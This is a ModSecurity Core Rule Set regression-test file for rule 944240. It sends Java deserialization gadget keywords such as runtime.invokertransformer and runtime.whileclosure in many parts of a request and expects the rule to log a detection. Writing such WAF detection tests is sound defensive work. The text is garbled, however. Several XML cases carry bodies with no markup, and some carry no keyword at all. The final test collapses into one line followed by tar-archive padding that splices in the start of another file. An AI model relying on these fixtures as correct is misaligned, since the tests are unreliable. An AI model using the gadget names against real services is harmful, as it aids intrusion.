              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-50'
    desc: 'XML element value includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.invokertransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-51'
    desc: 'Nested XML element value includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.invokertransformer'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-52'
    desc: 'Content-Type text/plain includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'text/plain'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.invokertransformer'
          output:
            log_contains: 'id "944240"'
  # Test 944240-53 is complete up to its request body; the expected output follows on the next line of the page.
  - test_title: '944240-53'
    desc: 'Content-Type application/json arg value includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"test": "runtime.invokertransformer"}'
# Expected log entry closing test 944240-53, whose request is defined on the previous line of the page.
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-54'
    desc: 'Content-Type application/json arg name includes keyword runtime.invokertransformer'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"runtime.invokertransformer": "test"}'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.prototypeclonefactory: one case per request location
  # (argument value/name, cookie value/name, header, XML, text/plain).
  # Each case is a positive test expecting rule id 944240 in the log.
  - test_title: '944240-55'
    desc: 'Argument test includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.prototypeclonefactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-56'
    desc: 'Argument name includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'runtime.prototypeclonefactory=test'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-57'
    desc: 'Cookie test includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=runtime.prototypeclonefactory'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-58'
    desc: 'Cookie name includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'runtime.prototypeclonefactory=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-59'
    desc: 'Request header test includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'runtime.prototypeclonefactory'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-60'
    desc: 'XML attribute value includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-61'
    desc: 'XML element value includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.prototypeclonefactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-62'
    desc: 'Nested XML element value includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.prototypeclonefactory'
          output:
            log_contains: 'id "944240"'
  # Test 944240-63 opens here; method, body and expected output follow on the next line of the page.
  - test_title: '944240-63'
    desc: 'Content-Type text/plain includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'text/plain'
# Continuation of test 944240-63 (text/plain body carries the keyword): method, body and expected log entry.
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.prototypeclonefactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-64'
    desc: 'Content-Type application/json arg value includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"test": "runtime.prototypeclonefactory"}'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-65'
    desc: 'Content-Type application/json arg name includes keyword runtime.prototypeclonefactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"runtime.prototypeclonefactory": "test"}'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.prototypeserializationfactory: one case per request
  # location (argument value/name, cookie value/name, header, XML,
  # text/plain, JSON value/name). Each expects rule id 944240 in the log.
  - test_title: '944240-66'
    desc: 'Argument test includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.prototypeserializationfactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-67'
    desc: 'Argument name includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'runtime.prototypeserializationfactory=test'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-68'
    desc: 'Cookie test includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=runtime.prototypeserializationfactory'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-69'
    desc: 'Cookie name includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'runtime.prototypeserializationfactory=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-70'
    desc: 'Request header test includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'runtime.prototypeserializationfactory'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-71'
    desc: 'XML attribute value includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-72'
    desc: 'XML element value includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.prototypeserializationfactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-73'
    desc: 'Nested XML element value includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.prototypeserializationfactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-74'
    desc: 'Content-Type text/plain includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'text/plain'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.prototypeserializationfactory'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-75'
    desc: 'Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"test": "runtime.prototypeserializationfactory"}'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-76'
    desc: 'Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/json'
            method: 'POST'
            version: 'HTTP/1.0'
            data: '{"runtime.prototypeserializationfactory": "test"}'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.whileclosure: argument value/name, cookie value/name,
  # header and XML cases. Each expects rule id 944240 in the log.
  - test_title: '944240-77'
    desc: 'Argument test includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.whileclosure'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-78'
    desc: 'Argument name includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'runtime.whileclosure=test'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-79'
    desc: 'Cookie test includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=runtime.whileclosure'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-80'
    desc: 'Cookie name includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'runtime.whileclosure=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-81'
    desc: 'Request header test includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'runtime.whileclosure'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-82'
    desc: 'XML attribute value includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944240"'
  # Test 944240-83 opens here; its remaining headers follow on the next line of the page.
  - test_title: '944240-83'
    desc: 'XML element value includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
# Continuation of test 944240-83 (XML element value): remaining headers, body and expected log entry.
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.whileclosure'
          output:
            log_contains: 'id "944240"'
  # Keyword runtime.whileclosure in a nested XML element and in a
  # text/plain body. Each case expects rule id 944240 in the log.
  - test_title: '944240-84'
    desc: 'Nested XML element value includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'runtime.whileclosure'
          output:
            log_contains: 'id "944240"'
  - test_title: '944240-85'
    desc: 'Content-Type text/plain includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'text/plain'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=runtime.whileclosure'
          output:
            log_contains: 'id "944240"'
  # Test 944240-86 opens here; the value of its last header key is on the next line of the page.
  - test_title: '944240-86'
    desc: 'Content-Type application/json arg value includes keyword runtime.whileclosure'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language:
"en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.whileclosure\"}" output: log_contains: "id \"944240\"" - test_title: 944240-87 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.whileclosure\": \"test\"}" output: log_contains: "id \"944240\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml��������0000664�0000000�0000000�00000044212�14461225151�0027674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944250.yaml" description: "Positive tests for rule 944250" tests: - test_title: 944250-0 desc: "Argument test includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
# Continuation of test 944250-0 (argument value carries java.evil.runtime); the first scalar below is its Accept header value.
